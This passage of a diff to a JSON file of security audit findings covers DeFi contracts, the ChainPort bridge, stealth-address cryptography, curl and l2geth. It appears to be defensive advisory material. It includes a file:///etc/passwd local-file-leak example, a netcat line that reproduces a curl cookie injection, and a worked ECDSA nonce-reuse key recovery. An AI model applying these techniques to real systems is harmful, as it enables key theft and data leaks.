_ratioA, uint256 _ratioB, uint8 _flashNum ) external isValidVault(_vaultAddr) onlyOwnerOrExecutor { IVault vault = IVault(_vaultAddr); [...] [...] IVault(_vaultAddr).setActiveProvider(_newProvider); } Figure 19.1: Controller.sol#L44-84 Exploit Scenario Alice, an executor of the Fuji Protocol, calls Controller.doRefinancing with the _newProvider parameter set to the same address as the active provider. As a result, unnecessary flash loan fees will be paid. Recommendations Short term, revise the doRefinancing function so that it reverts if _newProvider is set to the same address as the active provider. Long term, ensure that all functions revert if they are called with invalid values.", + "title": "17. Cryptographic primitives lack sanity checks and clear function names ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "Several cryptographic primitives are missing sanity checks on their inputs. Without such checks, problems could occur if the primitives are used incorrectly. The remove_0x function (figure 17.1) does not check that the input starts with 0x. A similar function in the eth-utils library has a more robust implementation, as it includes a check on its input (figure 17.2). 
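Because the bodies of figures 17.1 through 17.4 are redacted here, the following sketch only illustrates the kind of checks the finding asks for; the function names echo the originals, but the signatures and messages are assumptions:

def remove_0x(value: str) -> str:
    if not value.startswith("0x"):
        raise ValueError(f"expected a 0x-prefixed hex string, got {value!r}")
    return value[2:]

def add_leading_zeros_to_64(value: str) -> str:
    # Unlike the original add_leading_0, the name states the target width.
    if len(value) > 64:
        raise ValueError("value longer than 64 hex characters")
    return value.rjust(64, "0")

assert remove_0x("0xdeadbeef") == "deadbeef"
assert len(add_leading_zeros_to_64("abc")) == 64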
[REDACTED] Figure 17.1: chainport-backend/modules/cryptography_2key/signatures.py#L10-L16 [REDACTED] Figure 17.2: ethereum/eth-utils/eth_utils/hexadecimal.py#L43-L46 The add_leading_0 function's name does not indicate that the value is padded to a length of 64 (figure 17.3). [REDACTED] Figure 17.3: chainport-backend/modules/cryptography_2key/signatures.py#L19-L25 The _build_withdraw_message function does not ensure that the beneficiary_address and token_address inputs have the expected length of 66 bytes and that they start with 0x (figure 17.4). [REDACTED] Figure 17.4: chainport-backend/modules/cryptography_2key/signatures.py#L28-62 We did not identify problems in the way these primitives are currently used in the code, so we set the severity of this finding to informational. However, if the primitives are used improperly in the future, cryptographic bugs that can have severe consequences could be introduced, which is why we highly recommend fixing the issues described in this finding. Exploit Scenario A developer fails to understand the purpose of a function or receives an input from outside the system that has an unexpected format. Because the functions lack sanity checks, the code fails to do what the developer expected. This leads to a cryptographic vulnerability and the loss of funds. Recommendations Short term, add the missing checks and fix the naming issues described above. Where possible, use well-reviewed libraries rather than implementing cryptographic primitives in-house. Long term, review all the cryptographic primitives used in the codebase to ensure that the functions' purposes are clear and that functions perform sanity checks, preventing them from being used improperly. Where necessary, add comments to describe the functions' purposes.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -1390,109 +1390,109 @@ ] }, { - "title": "20. Lack of data validation on function parameters ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "Certain setter functions fail to validate the addresses they receive as input. The following addresses are not validated: The addresses passed to all setters in the FujiAdmin contract The _newFujiAdmin address in the setFujiAdmin function in the Controller and FujiVault contracts The _provider address in the FujiVault.setActiveProvider function The _oracle address in the FujiVault.setOracle function The _providers addresses in the FujiVault.setProviders function The newOwner address in the transferOwnership function in the Claimable and ClaimableUpgradeable contracts Exploit scenario Alice, a member of the Fuji Protocol team, invokes the FujiVault.setOracle function and sets the oracle address as address(0). As a result, code relying on the oracle address is no longer functional. Recommendations Short term, add zero-value or contract existence checks to the functions listed above to ensure that users cannot accidentally set incorrect values, misconfiguring the protocol. Long term, use Slither, which will catch missing zero checks.", + "title": "18. Use of requests without the timeout argument ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "The Python requests library is used in the ChainPort back end without the timeout argument. By default, the requests library will wait until the connection is closed before fulfilling a request. Without the timeout argument, the program will hang indefinitely. 
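The fix is mechanical; a sketch of the pattern with the requests library (the URL and limits below are illustrative):

import requests

resp = requests.get(
    "https://api.coingecko.com/api/v3/ping",
    timeout=(3.05, 10),  # (connect timeout, read timeout), in seconds
)
resp.raise_for_status()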
The following locations in the back-end code are missing the timeout argument: chainport-backend/modules/coingecko/api.py#L29 chainport-backend/modules/requests_2key/requests.py#L14 chainport-backend/project/stats/cg_prices.py#L74 chainport-backend/project/stats/cg_prices.py#L95 The code in these locations makes requests to the following websites: https://api.coingecko.com https://ethgasstation.info https://gasstation-mainnet.matic.network If any of these websites hang indefinitely, so will the back-end code. Exploit Scenario One of the requested websites hangs indefinitely. This causes the back end to hang, and token ports from other users cannot be processed. Recommendations Short term, add the timeout argument to each of the code locations indicated above. This will ensure that the code will not hang if the website being requested hangs. Long term, integrate Semgrep into the CI pipeline to ensure that uses of the requests library always have the timeout argument.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: Low" + "Severity: Low", + "Difficulty: High" ] }, { - "title": "12. Missing events for critical operations ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "Many functions that make important state changes do not emit events. These functions include, but are not limited to, the following: All setters in the FujiAdmin contract The setFujiAdmin, setFujiERC1155, setFactor, setOracle, and setProviders functions in the FujiVault contract The setMapping and setURI functions in the FujiMapping contract The setFujiAdmin and setExecutors functions in the Controller contract The setURI and setPermit functions in the FujiERC1155 contract The setPriceFeed function in the FujiOracle contract Exploit scenario An attacker gains permission to execute an operation that changes critical protocol parameters. She executes the operation, which does not emit an event. Neither the Fuji Protocol team nor the users are notified about the parameter change. The attacker uses the changed parameter to steal funds. Later, the attack is detected due to the missing funds, but it is too late to react and mitigate the attack. Recommendations Short term, ensure that all state-changing operations emit events. Long term, use an event monitoring system like Tenderly or Defender, use Defender's automated incident response feature, and develop an incident response plan to follow in case of an emergency.", + "title": "19. Lack of noopener attribute on external links ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "In the ChainPort front-end application, there are links to external websites that have the target attribute set to _blank but lack the noopener attribute. Without this attribute, an attacker could perform a reverse tabnabbing attack. [REDACTED] Figure 19.1: chainport-app/src/modules/exchange/components/PortOutModal.jsx#L126 Exploit Scenario An attacker takes control of one of the external domains linked by the front end. The attacker prepares a malicious script on the domain that uses the window.opener variable to control the parent window's location. A user clicks on the link in the ChainPort front end. The malicious website is opened in a new window, and the original ChainPort front end is seamlessly replaced by a phishing website. 
The victim then returns to a page that appears to be the original ChainPort front end but is actually a web page controlled by the attacker. The attacker tricks the user into transferring his funds to the attacker. Recommendations Short term, add the missing rel=\"noopener noreferrer\" attribute to the anchor tags. References OWASP: Reverse tabnabbing attacks", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Low" + "Difficulty: High" ] }, { - "title": "13. Indexes are not updated before all operations that require up-to-date indexes ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "The FujiERC1155 contract uses indexes to keep track of interest rates. Refer to Appendix F for more detail on the index calculation. The FujiVault contract's updateF1155Balances function is responsible for updating indexes. However, this function is not called before all operations that read indexes. As a result, these operations use outdated indexes, which results in incorrect accounting and could make the protocol vulnerable to exploits. FujiVault.deposit calls FujiERC1155._mint, which reads indexes but does not call updateF1155Balances. FujiVault.paybackLiq calls FujiERC1155.balanceOf, which reads indexes but does not call updateF1155Balances. Exploit Scenario The indexes have not been updated in one day. User Bob deposits collateral into the FujiVault. Day-old indexes are used to compute Bob's scaled amount, causing Bob to gain interest for an additional day for free. Recommendations Short term, ensure that all operations that require up-to-date indexes first call updateF1155Balances. Write tests for each function that depends on up-to-date indexes with assertions that fail if indexes are outdated. Long term, redesign the way indexes are accessed and updated such that a developer cannot simply forget to call updateF1155Balances.", + "title": "20. Use of urllib could allow users to leak local files ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "To upload images of new tokens to S3, the upload_media_from_url_to_s3 function uses the urllib library (figure 20.1), which supports the file:// scheme; therefore, if a malicious actor controls a dynamic value uploaded to S3, she could read arbitrary local files. [REDACTED] Figure 20.1: chainport-backend/modules/infrastructure/aws/s3.py#L25-29 The code in figure 20.2 replicates this issue. [REDACTED] Figure 20.2: Code to test urlopen's support of the file:// scheme We set the severity of this finding to undetermined because it is unclear whether an attacker (e.g., a token owner) would have control over token images uploaded to S3 and whether the server holds files that an attacker would want to extract. Exploit Scenario A token owner makes the image of his token point to a local file (e.g., file:///etc/passwd). This local file is uploaded to the S3 bucket and is shown to an attacker attempting to port his own token into the ChainPort front end. The local file is leaked to the attacker. Recommendations Short term, use the requests library instead of urllib. The requests library does not support the file:// scheme.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Undetermined", "Difficulty: High" ] }, { - "title": "15. 
Formula for index calculation is unnecessarily complex ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "Indexes are updated within the FujiERC1155 contract's updateState function, shown in figure 15.1. Refer to Appendix F for more detail on the index calculation. function updateState(uint256 _assetID, uint256 newBalance) external override onlyPermit { uint256 total = totalSupply(_assetID); if (newBalance > 0 && total > 0 && newBalance > total) { uint256 diff = newBalance - total; uint256 amountToIndexRatio = (diff.wadToRay()).rayDiv(total.wadToRay()); uint256 result = amountToIndexRatio + WadRayMath.ray(); result = result.rayMul(indexes[_assetID]); require(result <= type(uint128).max, Errors.VL_INDEX_OVERFLOW); indexes[_assetID] = uint128(result); // TODO: calculate interest rate for a fujiOptimizer Fee. } } Figure 15.1: FujiERC1155.sol#L40-57 The code in figure 15.1 translates to the following equation: index_new = index_old * (1 + (newBalance - total) / total). Using the distributive property, we can transform this equation into the following: index_new = index_old * (total / total + (newBalance - total) / total). This version can then be simplified: index_new = index_old * ((total + newBalance - total) / total). Finally, we can simplify the equation even further: index_new = index_old * (newBalance / total). The resulting equation is simpler and more intuitively conveys the underlying idea: that the index grows by the same ratio as the balance grew since the last index update. Recommendations Short term, use the simpler index calculation formula in the updateState function of the FujiERC1155 contract. This will result in code that is more intuitive and that executes using slightly less gas. Long term, use simpler versions of the equations used by the protocol to make the arithmetic easier to understand and implement correctly.", + "title": "21. The front end is vulnerable to iFraming ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "The ChainPort front end does not prevent other websites from iFraming it. Figure 21.1 shows an example of how another website could iFrame the ChainPort front end. [REDACTED] Figure 21.1: An example of how another website could iFrame the ChainPort front end Exploit Scenario An attacker creates a website that iFrames ChainPort's front end. The attacker performs a clickjacking attack to trick users into submitting malicious transactions. Recommendations Short term, add the X-Frame-Options: DENY header on every server response. This will prevent other websites from iFraming the ChainPort front end.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Low", "Difficulty: High" ] }, { - "title": "16. Flasher's initiateFlashloan function does not revert on invalid flashnum values ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "The Flasher contract's initiateFlashloan function does not initiate a flash loan or perform a refinancing operation if the flashnum parameter is set to a value greater than 2. However, the function does not revert on invalid flashnum values. function initiateFlashloan(FlashLoan.Info calldata info, uint8 _flashnum) external isAuthorized { if (_flashnum == 0) { _initiateAaveFlashLoan(info); } else if (_flashnum == 1) { _initiateDyDxFlashLoan(info); } else if (_flashnum == 2) { _initiateCreamFlashLoan(info); } } Figure 16.1: Flasher.sol#L61-69 Exploit Scenario Alice, an executor of the Fuji Protocol, calls Controller.doRefinancing with the flashnum parameter set to 3. 
As a result, no flash loan is initialized, and no refinancing happens; only the active provider is changed. This results in unexpected behavior. For example, if a user wants to repay his debt after refinancing, the operation will fail, as no debt is owed to the active provider. Recommendations Short term, revise initiateFlashloan so that it reverts when it is called with an invalid flashnum value. Long term, ensure that all functions revert if they are called with invalid values.", + "title": "22. Lack of CSP header in the ChainPort front end ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-chainport-securityreview.pdf", + "body": "The ChainPort front end lacks a Content Security Policy (CSP) header, leaving it vulnerable to cross-site scripting (XSS) attacks. A CSP header adds extra protection against XSS and data injection attacks by enabling developers to select the sources that the browser can execute or render code from. This safeguard requires the use of the CSP HTTP header and appropriate directives in every server response. Exploit Scenario An attacker finds an XSS vulnerability in the ChainPort front end and crafts a custom XSS payload. Because of the lack of a CSP header, the browser executes the attack, enabling the attacker to trick users into transferring their funds to him. Recommendations Short term, use a CSP header in the ChainPort front end and validate it with the CSP Evaluator. This will help mitigate the effects of XSS attacks. Long term, track the development of the CSP header and similar web browser features that help mitigate security risks. Ensure that new protections are adopted as quickly as possible. References HTTP Content Security Policy (CSP) Google CSP Evaluator Google Web Security Fundamentals: Eval Google Web Security Fundamentals: Inline code is considered harmful", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Low", "Difficulty: High" ] }, { - "title": "21. Solidity compiler optimizations can be problematic ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/FujiProtocol.pdf", - "body": "Fuji Protocol has enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed. Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past. A high-severity bug in the emscripten-generated solc-js compiler used by Truffle and Remix persisted until late 2018. The fix for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6. More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe. It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizations, or in the Emscripten transpilation to solc-js, causes a security vulnerability in the Fuji Protocol contracts. 
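Returning to finding 20 for a moment: if the fetch library is switched, an explicit scheme check still makes the intent auditable. A hedged sketch (the function name and the use of requests are assumptions, not the ChainPort implementation):

from urllib.parse import urlparse

import requests

def fetch_token_image(url: str) -> bytes:
    # urlopen would happily follow file:// and leak local files; reject
    # anything that is not plain http(s) before fetching.
    if urlparse(url).scheme not in ("http", "https"):
        raise ValueError(f"refusing to fetch non-HTTP URL: {url}")
    resp = requests.get(url, timeout=10)
    resp.raise_for_status()
    return resp.content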
Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", + "title": "1. Related-nonce attacks across keys allow root key recovery ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-ryanshea-practicalstealthaddresses-securityreview.pdf", + "body": "Given multiple addresses generated by the same sender, if any two signatures with the associated private keys use the same nonce, then the recipient's private root key can be recovered. Nonce reuse attacks are a known risk for single ECDSA keys, but this attack extends the vulnerability to all keys generated by a given sender. Exploit Scenario Alice uses Bob's public key to generate addresses P_1 = H(s||1) * G + B and P_2 = H(s||2) * G + B and deposits funds in each. Bob's corresponding private keys will be b_1 = H(s||1) + b and b_2 = H(s||2) + b. Note that, while Alice does not know b_1 or b_2, she does know the difference of the two: d = b_2 - b_1 = H(s||2) - H(s||1). As a result, she can write b_2 = b_1 + d. Suppose Bob signs messages with hashes h_1 and h_2 (respectively) to transfer the funds out of P_1 and P_2, and he uses the same nonce k in both signatures. He will output signatures (r, s_1) and (r, s_2), where r = x(k * G), s_1 = k^-1 (h_1 + r b_1), and s_2 = k^-1 (h_2 + r b_1 + r d). Subtracting the s-values gives us s_1 - s_2 = k^-1 (h_1 - h_2 - r d). Because all the terms except k are known, Alice can recover k, and thus b_1, and b = b_1 - H(s||1). Recommendations Consider using deterministic nonce generation in any stealth-enabled wallets. This is an approach used in multiple elliptic curve digital signature schemes, and can be adapted to ECDSA relatively easily; see RFC 6979. Also consider root key blinding: set P_i = H(s||i) * G + H(s||i||label) * B, where label is a fixed domain-separation string. With blinding, private keys take the form b_i = H(s||i) + H(s||i||label) * b. Since the b terms no longer cancel out, Alice cannot find d, and the attack falls apart. Finally, consider using homogeneous key derivation: set P_i = H(s||i) * B. The private key for Bob is then b_i = H(s||i) * b. Because Alice does not know b, she cannot find d, and the attack falls apart. References ECDSA: Handle with Care RFC 6979: Deterministic Usage of the Digital Signature Algorithm (DSA) and Elliptic Curve Digital Signature Algorithm (ECDSA)", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: High" + "Severity: Medium", + "Difficulty: Undetermined" ] }, { - "title": "1. Bad recommendation in libcurl cookie documentation ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", - "body": "The libcurl documentation recommends that, to enable the cookie store with a blank cookie database, the calling application should use the CURLOPT_COOKIEFILE option with a non-existing file name or plain \"\", as shown in figure 1.1. However, the former recommendation, a non-blank filename with a target that does not exist, can have unexpected results if a file by that name is unexpectedly present. 
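The algebra of the related-nonce attack above can be checked numerically. A toy sketch over the secp256k1 group order; all scalars are made-up values, and no curve points are actually computed:

N = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEBAAEDCE6AF48A03BBFD25E8CD0364141  # secp256k1 order

def inv(x: int) -> int:
    return pow(x, -1, N)

k = 123456789        # the reused nonce (unknown to Alice)
b1 = 987654321       # Bob's first stealth private key (unknown to Alice)
d = 555              # H(s||2) - H(s||1), known to Alice
b2 = (b1 + d) % N
r = 1122334455       # x-coordinate of k*G; identical in both signatures (toy value)
h1, h2 = 777, 888    # the two message hashes (public)

s1 = inv(k) * (h1 + r * b1) % N
s2 = inv(k) * (h2 + r * b2) % N

# s1 - s2 = k^-1 * (h1 - h2 - r*d), and every term except k is public:
k_recovered = (h1 - h2 - r * d) * inv(s1 - s2) % N
b1_recovered = (s1 * k_recovered - h1) * inv(r) % N
assert (k_recovered, b1_recovered) == (k, b1)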
Figure 1.1: The recommendation in libcurl's documentation Exploit Scenario An inexperienced developer uses libcurl in his application, invoking the CURLOPT_COOKIEFILE option and hard-coding a filename that he thinks will never exist (e.g., a long random string), but which could potentially be created on the filesystem. An attacker reverse-engineers his program to determine the filename and path in question, and then uses a separate local file write vulnerability to inject cookies into the application. Recommendations Short term, remove the reference to a non-existing file name; mention only a blank string. Long term, avoid suggesting tricks such as this in documentation when a misuse or misunderstanding of them could result in side effects of which users may be unaware.", + "title": "2. Limited forgeries for related keys ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-ryanshea-practicalstealthaddresses-securityreview.pdf", + "body": "If Bob signs a message for an address generated by Alice, Alice can convert it into a valid signature for another address. She cannot, however, control the hash of the message being signed, so this attack is of limited value. As with the related-nonce attack, this attack relies on Alice knowing the difference in discrete logarithms between two addresses. Exploit Scenario Alice generates addresses P_1 = H(s||1) * G + B and P_2 = H(s||2) * G + B and deposits funds in each account. As before, Alice knows d, the difference of the discrete logs for P_1 and P_2, and P_2 = P_1 + d * G. Bob transfers money out of P_2, generating signature (r, s) of a message with hash h, where r is the x-coordinate of k * G (where k is the nonce). The signature is validated by computing R = s^-1 h * G + s^-1 r * P_2 and verifying that the x-coordinate of R matches r. Alice can convert this into a signature under P_1 for a message with hash h' = h + r d. Verifying this signature under P_1, computing R becomes: R = s^-1 (h + r d) * G + s^-1 r * P_1 = s^-1 h * G + s^-1 r d * G + s^-1 r * P_1 = s^-1 h * G + s^-1 r * (P_1 + d * G) = s^-1 h * G + s^-1 r * P_2. This is the same relation that makes (r, s) a valid signature on a message with hash h, so the check will pass. Note that Alice has no control over the value of h', so to make an effective exploit, she would have to find a preimage of h' under the given hash function. Computing preimages is, to date, a hard problem for SHA-256 and related functions. Recommendations Consider root key blinding, as above. The attack relies on Alice knowing d, and root key blinding prevents her from learning it. Consider homogeneous key derivation, as above. Once again, depriving Alice of d obviates the attack completely.", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Medium" + "Difficulty: Low" ] }, { - "title": "2. Libcurl URI parser accepts invalid characters ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", - "body": "According to RFC 3986 section 2.2, Reserved Characters, reserved = gen-delims / sub-delims gen-delims = \":\" / \"/\" / \"?\" / \"#\" / \"[\" / \"]\" / \"@\" sub-delims = \"!\" / \"$\" / \"&\" / \"'\" / \"(\" / \")\" / \"*\" / \"+\" / \",\" / \";\" / \"=\" Figure 2.1: Reserved characters for URIs. Furthermore, the host eld of the URI is dened as follows: host = IP-literal / IPv4address / reg-name reg-name = *( unreserved / pct-encoded / sub-delims ) ... 
unreserved = ALPHA / DIGIT / \"-\" / \".\" / \"_\" / \"~\" sub-delims = \"!\" / \"$\" / \"&\" / \"'\" / \"(\" / \")\" / \"*\" / \"+\" / \",\" / \";\" / \"=\" Figure 2.2: Valid characters for the URI host field However, cURL does not seem to strictly adhere to this format, as it accepts characters not included in the above. This behavior is present in both libcurl and the cURL binary. For instance, characters from the gen-delims set, and those not in the reg-name set, are accepted: $ curl -g \"http://foo[]bar\" # from gen-delims curl: (6) Could not resolve host: foo[]bar $ curl -g \"http://foo{}bar\" # outside of reg-name curl: (6) Could not resolve host: foo{}bar Figure 2.3: cURL accepting characters that are not valid in a URI host The exploitability and impact of this issue is not yet well understood; this may be deliberate behavior to account for currently unknown edge-cases or legacy support. Recommendations Short term, determine whether these characters are being allowed for compatibility reasons. If so, it is likely that nothing can be done; if not, however, make the URI parser stricter, rejecting characters that cannot appear in a valid URI as defined by RFC 3986. Long term, add fuzz tests for the URI parser that use forbidden or out-of-scope characters.", + "title": "3. Mutual transactions can be completely deanonymized ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-ryanshea-practicalstealthaddresses-securityreview.pdf", + "body": "When Alice and Bob both make stealth payments to each other, they generate the same Shared Secret #i for transaction i, which is used to derive destination keys for Bob and Alice.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Low" + "Severity: Medium", + "Difficulty: Medium" ] }, { - "title": "3. libcurl Alt-Svc parser accepts invalid port numbers ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", - "body": "Invalid port numbers in Alt-Svc headers, such as negative numbers, may be accepted by libcurl when presented by an HTTP server. libcurl uses the strtoul function to parse port numbers in Alt-Svc headers. This function will accept and parse negative numbers and represent them as unsigned integers without indicating an error. For example, when an HTTP server provides an invalid port number of -18446744073709543616, cURL parses the number as 8000: * Using HTTP2, server supports multiplexing * Connection state changed (HTTP/2 confirmed) * Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0 * Using Stream ID: 1 (easy handle 0x12d013600) > GET / HTTP/2 > Host: localhost:2443 > user-agent: curl/7.79.1 > accept: */* > < HTTP/2 200 < server: basic-h2-server/1.0 < content-length: 130 < content-type: application/json * Added alt-svc: localhost: 8000 over h3 < alt-svc: h3=\": -18446744073709543616 \" < Figure 3.1: Example cURL session Exploit Scenario A server operator wishes to target cURL clients and serve them alternative content. The operator includes a specially-crafted, invalid Alt-Svc header on the HTTP server responses, indicating that HTTP/3 is available on port -18446744073709543616 , an invalid, negative port number. When users connect to the HTTP server using standards-compliant HTTP client software, their clients ignore the invalid header. 
However, when users connect using cURL, it interprets the negative number as an unsigned integer and uses the resulting port number, 8000 , to upgrade the next connection to HTTP/3. The server operator hosts alternative content on this other port. Recommendations Short term, improve parsing and validation of Alt-Svc headers so that invalid port values are rejected. Long term, add fuzz and differential tests to the Alt-Svc parsing code to detect non-standard behavior.", + "title": "4. Allowing invalid public keys may enable DH private key recovery ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-02-ryanshea-practicalstealthaddresses-securityreview.pdf", + "body": "Consider the following three assumptions: 1. Alice can add points that are not on the elliptic curve to the public key database, 2. Bob does not verify the public key points, and 3. Bob's scalar multiplication implementation has some specific characteristics. Assumptions 1 and 2 are currently not specified in the specification, which motivates this finding. If these assumptions hold, then Alice can recover Bob's DH key using a complicated attack, based on the CRYPTO 2000 paper by Biehl et al. and the DCC 2005 paper by Ciet et al. What follows is a rough sketch of the attack. For more details, see the reference publications, which also detail the specific characteristics for Assumption 3. Exploit Scenario Alice roughly follows the following steps: 1. Find a point P' that is not on the curve used for ECDH and that, when used in Bob's scalar multiplication, effectively lies on a different curve E' with (a subgroup of) small prime order p'. 2. Brute-force all possible values S' of the shared secret b_dh * P' (there are at most p' candidates), and send funds to all addresses with shared secret S', i.e., P'_0 = H(S'||0) * G + B. 3. Monitor all resulting addresses until Bob withdraws funds from the unique stealth address associated with S' = b_dh * P'; this reveals b_dh mod p'. 4. Repeat steps 1-3 for new points P' with different small prime orders p' to recover further residues of b_dh. 5. Use the Chinese Remainder Theorem to recover b_dh from the residues. As a result, Alice can now track all stealth payments made to Bob (but cannot steal funds). To understand the complexity of this attack, it is sufficient for Alice to repeat steps 1-3 for the first 44 primes (numbers between 2 and 193). This requires Alice to make 3,831 payments in total (corresponding to the sum of the first 44 primes). There is a tradeoff where Alice uses fewer primes, which means that fewer transactions are needed. However, it means that Alice does not recover the full b_dh. To compensate for this, Alice can brute-force the discrete logarithm of B_dh guided by the partial information on b_dh. Because the attack compromises anonymity for a particular user without giving access to funds, we consider this issue to have medium severity. As this is a complicated attack with various assumptions that requires Bob to access the funds from all his stealth addresses, we consider this issue to have high difficulty. Recommendations The specification should enforce that public keys are validated for correctness, both when they are added to the public database and when they are used by senders and receivers. These validations should include point-on-curve checks, small-order-subgroup checks (if applicable), and point-at-infinity checks. 
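Step 5 above is ordinary number theory; a toy sketch of reassembling b_dh from the collected residues with the Chinese Remainder Theorem (the residues are made-up values):

from math import prod

residues = {3: 2, 5: 1, 7: 4, 11: 9}  # small prime p' -> recovered b_dh mod p'

def crt(congruences: dict) -> int:
    M = prod(congruences)  # product of the moduli (the dict keys)
    total = 0
    for n, a in congruences.items():
        m = M // n
        total += a * m * pow(m, -1, n)
    return total % M

b_dh = crt(residues)
assert all(b_dh % n == a for n, a in residues.items())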
References Differential Fault Attacks on Elliptic Curve Cryptosystems, Biehl et al., 2000 Elliptic Curve Cryptosystems in the Presence of Permanent and Transient Faults, Ciet et al., 2005", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: Undetermined" + "Severity: Medium", + "Difficulty: High" ] }, { - "title": "4. Non-constant-time comparison of secrets ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", - "body": "Several cases were discovered in which possibly user-supplied values are checked against a known secret using non-constant-time comparison. In cases where an attacker can accurately time how long it takes for the application to fail validation of submitted data that he controls, such behavior could leak information about the secret itself, allowing the attacker to brute-force it in linear time. In the example below, credentials are checked via Curl_safecmp() , which is a memory-safe, but not constant-time, wrapper around strcmp() . This is used to determine whether or not to reuse an existing TLS connection. #ifdef USE_TLS_SRP Curl_safecmp(data->username, needle->username) && Curl_safecmp(data->password, needle->password) && (data->authtype == needle->authtype) && #endif Figure 4.1: lib/url.c , lines 148 through 152. Credentials checked using a memory-safe, but not constant-time, wrapper around strcmp() The above is one example out of several cases found. Exploit Scenario An application uses a libcurl build with TLS-SRP enabled and allows multiple users to make TLS connections to a remote server. An attacker times how quickly cURL responds to his requests to create a connection, and thereby gradually works out the credentials associated with an existing connection. Eventually, he is able to submit a request with exactly the same SSL configuration such that another user's existing connection is reused. Recommendations Short term, introduce a method, e.g. Curl_constcmp() , which does a constant-time comparison of two strings; that is, it scans both strings exactly once in their entirety. Long term, compare secrets to user-submitted values using only constant-time algorithms.", + "title": "2. Multiple instances of unchecked errors ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-08-scrollL2geth-initial-securityreview.pdf", + "body": "There are multiple instances of unchecked errors in the l2geth codebase, which could lead to undefined behavior when errors are raised. One such unhandled error is shown in figure 2.1. A comprehensive list of unchecked errors is provided in appendix C. if len(requests) == 0 && req.deps == 0 { s.commit(req) } else { Figure 2.1: The Sync.commit() function returns an error that is unhandled, which could lead to invalid commitments or a frozen chain. (go-ethereum/trie/sync.go#296-298) Unchecked errors also make the system vulnerable to denial-of-service attacks; they could allow attackers to trigger nil dereference panics in the sequencer node. Exploit Scenario An attacker identifies a way to cause a zkTrie commitment to fail, allowing invalid data to be silently committed by the sequencer. Recommendations Short term, add error checks to all functions that can emit Go errors. Long term, add the tools errcheck and ineffassign to l2geth's build pipeline. 
These tools can be used to detect errors and prevent builds containing unchecked errors from being deployed.", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: Undetermined" + "Severity: Low", + "Difficulty: High" ] }, { - "title": "5. Tab injection in cookie file ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-curl-securityreview.pdf", - "body": "When libcurl makes an HTTP request, the cookie jar file is overwritten to store the cookies, but the storage format uses tabs to separate key pieces of information. The cookie parsing code for HTTP headers strips the leading and trailing tabs from cookie keys and values, but it does not reject cookies with tabs inside the keys or values. In the snippet of lib/cookie.c below, Curl_cookie_add() parses tab-separated cookie data via strtok_r() and uses a switch-based state machine to interpret specific parts as key information: firstptr = strtok_r(lineptr, \"\\t\" , &tok_buf); /* tokenize it on the TAB */ Figure 5.1: Parsing tab-separated cookie data via strtok_r() Exploit Scenario A webpage returns a Set-Cookie header with a tab character in the cookie name. When a cookie file is saved from cURL for this page, the part of the name before the tab is taken as the key, and the part after the tab is taken as the value. The next time the cookie file is loaded, these two values will be used. % echo \"HTTP/1.1 200 OK\\r\\nSet-Cookie: foo\\tbar=\\r\\n\\r\\n\\r\\n\"|nc -l 8000 & % curl -v -c /tmp/cookies.txt http://localhost:8000 * Trying 127.0.0.1:8000... * Connected to localhost (127.0.0.1) port 8000 (#0) > GET / HTTP/1.1 > Host: localhost:8000 > User-Agent: curl/7.79.1 > Accept: */* * Mark bundle as not supporting multiuse < HTTP/1.1 200 OK * Added cookie foo 